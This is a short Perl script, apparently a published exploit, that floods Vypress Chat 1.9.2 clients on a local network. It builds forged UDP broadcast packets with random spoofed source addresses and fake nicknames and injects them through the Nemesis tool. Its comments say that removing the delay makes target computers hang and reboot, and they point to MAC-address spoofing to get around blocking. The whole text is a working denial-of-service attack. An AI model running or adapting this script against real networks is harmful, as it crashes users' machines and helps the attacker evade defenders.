#!/usr/bin/perl -w

# Andrew I Baznikin, dikiy@scn.ru
#
# Vypress chat (http://www.vypress.com/rus/products/chat/) flooder.
# With no awaiting between packets, client computer will hang and reboot
# Tested on Vypress chat 1.9.2
#
# Nemesis (http://www.packetfactory.net/projects/nemesis/) used to inject
# faked packets.
#
# This attack can be stopped only by blocking attacker hardwire (MAC) address.
# If so, you can use http://ezine.daemonnews.org/200406/netgraph.html to spoof
# your MAC-address

use strict;

my $addr = "255.255.255.255";
my $port = 8167;		# Vypress Chat port
my $chan = "#Main";
# seconds between messages
my $wait = 1.5;
my $verbose = 0;
# 0 - unlimited
my $count = 5;

my $num=0;
my $starttime = time();

$SIG{TERM} = \&signal;
$SIG{INT} = \&signal;

while (1) {

	# Construct faked source address
	# 10.x.x.x
	my $srcip = "10.". int(rand 255) .".". int(rand 255) .".". int(rand 255);
	# 192.168.0.x (x=100..250)
	#my $srcip = "192.168.0.". int(rand(100)+150);

	my ($nick, $id);
	$nick .= chr(int(rand(26)) + ord('a')) for (2 .. int(rand(6)+2));
	$id .=int(rand(9)) for (1..9);

	print "$srcip\t$chan\t$nick\n" if $verbose;

	# Use nemesis to inject packet
	open D, "|nemesis udp -v -d rl0 -S $srcip -D $addr -x $port -y $port -P - >/dev/null";

	# girl with random nick enter #Main channel
	print D "X${id}4${nick}\x00${chan}\x0010\x00";
	print D "X${id}2${chan}\x00${nick}\x00(K)\x00";

	$num++;
	if ($count && $count-- ==1) {
		print_stat();
		exit;
	}

	# wait between messages. Comment for flood out Vypress
	sleep $wait;
}

sub signal {
	print_stat();
	exit;
}

sub print_stat {
	my $elap = time()-$starttime;
	print "== $num packets sent\n";
	print "== $elap sec elapsed; ", sprintf("%.2f", $num/($elap?$elap:1)) ," packets/sec\n";
}